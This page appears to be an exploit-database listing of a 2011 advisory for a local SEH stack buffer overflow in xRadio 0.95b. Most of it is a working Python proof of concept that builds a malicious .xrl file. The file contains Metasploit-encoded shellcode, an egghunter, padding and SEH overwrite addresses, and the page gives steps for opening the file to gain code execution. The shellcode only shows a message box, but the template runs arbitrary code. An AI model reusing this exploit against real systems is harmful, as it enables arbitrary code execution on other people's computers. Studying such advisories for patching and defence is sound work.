[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)

Author
b0telh0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15179
Category
local exploits
Date add
10-02-2011
Platform
windows
GotGeek Labs
http://www.gotgeek.com.br/
 
xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)
 
 
 
[+] Description
 
With xRadio you can listen internet radio with Windows Media Player Technology (tm).
You can setup a radio list and import asx's files. The program stay on the tray bar.
 
 
 
[+] Information
 
Title: xRadio 0.95b (.xrl) Local Buffer Overflow (SEH)
Advisory: gg-001-2011
Date: 02-08-2011
Last update: 02-08-2011
Link: http://www.gotgeek.com.br/pocs/gg-001-2011.txt
Tested on: Windows XP SP3 (VirtualBox)
 
 
 
[+] Vulnerability
 
xRadio is affected by stack-based buffer overflow vulnerability because it fails
to perform adequate boundary checks on user-supplied input.
Successful exploitation of the vulnerability allows an attacker to execute
arbitrary code. Other versions are also affected but have a different trigger.
 
Affected Versions:
xRadio 0.95b
xRadio 0.9
xRadio 0.5
 
 
 
[+] Proof of Concept/Codes
 
#!/usr/bin/python
#
 
 
#
# windows/messagebox - 590 bytes
# x86/alpha_upper
# http://www.metasploit.com
#
shellcode = ("\x89\xe1\xd9\xd0\xd9\x71\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
    "\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
    "\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
    "\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
    "\x38\x41\x43\x4a\x4a\x49\x58\x59\x5a\x4b\x4d\x4b\x58\x59\x54"
    "\x34\x47\x54\x4c\x34\x50\x31\x58\x52\x4e\x52\x43\x47\x50\x31"
    "\x58\x49\x52\x44\x4c\x4b\x52\x51\x56\x50\x4c\x4b\x54\x36\x54"
    "\x4c\x4c\x4b\x54\x36\x45\x4c\x4c\x4b\x51\x56\x43\x38\x4c\x4b"
    "\x43\x4e\x47\x50\x4c\x4b\x56\x56\x50\x38\x50\x4f\x45\x48\x52"
    "\x55\x5a\x53\x51\x49\x45\x51\x58\x51\x4b\x4f\x4b\x51\x43\x50"
    "\x4c\x4b\x52\x4c\x51\x34\x47\x54\x4c\x4b\x50\x45\x47\x4c\x4c"
    "\x4b\x50\x54\x56\x48\x43\x48\x45\x51\x4b\x5a\x4c\x4b\x51\x5a"
    "\x45\x48\x4c\x4b\x50\x5a\x51\x30\x45\x51\x5a\x4b\x4d\x33\x50"
    "\x34\x51\x59\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x5a\x4e\x56\x51"
    "\x4b\x4f\x50\x31\x49\x50\x4b\x4c\x4e\x4c\x4d\x54\x4f\x30\x43"
    "\x44\x45\x57\x4f\x31\x58\x4f\x54\x4d\x43\x31\x49\x57\x5a\x4b"
    "\x4c\x34\x47\x4b\x43\x4c\x56\x44\x51\x38\x54\x35\x4b\x51\x4c"
    "\x4b\x50\x5a\x56\x44\x45\x51\x5a\x4b\x52\x46\x4c\x4b\x54\x4c"
    "\x50\x4b\x4c\x4b\x51\x4a\x45\x4c\x45\x51\x5a\x4b\x4c\x4b\x43"
    "\x34\x4c\x4b\x45\x51\x4b\x58\x4d\x59\x51\x54\x56\x44\x45\x4c"
    "\x45\x31\x58\x43\x4f\x42\x45\x58\x51\x39\x49\x44\x4b\x39\x4d"
    "\x35\x4b\x39\x49\x52\x43\x58\x4c\x4e\x50\x4e\x54\x4e\x5a\x4c"
    "\x51\x42\x4d\x38\x4d\x4f\x4b\x4f\x4b\x4f\x4b\x4f\x4c\x49\x51"
    "\x55\x54\x44\x4f\x4b\x43\x4e\x4e\x38\x4d\x32\x43\x43\x4b\x37"
    "\x45\x4c\x56\x44\x56\x32\x5a\x48\x4c\x4e\x4b\x4f\x4b\x4f\x4b"
    "\x4f\x4b\x39\x51\x55\x45\x58\x43\x58\x52\x4c\x52\x4c\x51\x30"
    "\x47\x31\x43\x58\x56\x53\x47\x42\x56\x4e\x45\x34\x43\x58\x52"
    "\x55\x54\x33\x45\x35\x52\x52\x4b\x38\x51\x4c\x56\x44\x54\x4a"
    "\x4d\x59\x4d\x36\x50\x56\x4b\x4f\x51\x45\x54\x44\x4c\x49\x58"
    "\x42\x56\x30\x4f\x4b\x4e\x48\x4e\x42\x50\x4d\x4f\x4c\x4c\x47"
    "\x45\x4c\x51\x34\x50\x52\x5a\x48\x43\x51\x4b\x4f\x4b\x4f\x4b"
    "\x4f\x45\x38\x43\x52\x52\x52\x51\x48\x47\x50\x45\x38\x52\x43"
    "\x52\x4f\x52\x4d\x56\x4e\x52\x48\x43\x55\x43\x55\x52\x4b\x56"
    "\x4e\x52\x48\x45\x37\x52\x4f\x43\x44\x52\x47\x50\x31\x49\x4b"
    "\x4c\x48\x51\x4c\x56\x44\x54\x4e\x4c\x49\x5a\x43\x52\x48\x52"
    "\x4c\x43\x58\x50\x30\x56\x38\x43\x58\x45\x32\x56\x50\x52\x54"
    "\x43\x55\x50\x31\x49\x59\x4b\x38\x50\x4c\x47\x54\x45\x57\x4c"
    "\x49\x4b\x51\x56\x51\x58\x52\x43\x5a\x47\x30\x50\x53\x50\x51"
    "\x51\x42\x4b\x4f\x58\x50\x56\x51\x49\x50\x56\x30\x4b\x4f\x50"
    "\x55\x43\x38\x41\x41")
 
junk = "\x41" * 3248
tag = "\x77\x30\x30\x74\x77\x30\x30\x74"    # w00tw00t
nops = "\x90" * 230
 
# Of course we don't need this.. It was just for fun...
#
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
             "\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")    # 32 bytes
 
nseh = "\xeb\x88\x90\x90"      # jump back 118 bytes
seh  = "\x82\xe2\x47\x00"      # pop eax - pop ebx - ret at 0x0047E282 [xradio.exe]
junk2 = "\x42" * 884
 
try:
    file = open('b0t.xrl','w');
    file.write(junk+tag+shellcode+nops+egghunter+nseh+seh+junk2);
    file.close();
    print "\n[*] gotgeek labs"
    print "[*] http://gotgeek.com.br\n"
    print "[+] b0t.xrl created."
    print "[+] Open xRadio.exe..."
    print "[+] and Radios >> Edit List >> Save radio list"
    print "[+] Select the *.xrl file, press Yes and boom!!\n"
except:
    print "\n[-] Error.. Can't write file to system.\n"
 
 
 
[+] References
 
http://www.puntoequis.com.ar/aktive/default.aspx?SC=SOFT&ID=xRadio
 
 
 
[+] Credits
 
b0telh0



#  0day.today [2024-12-24]  #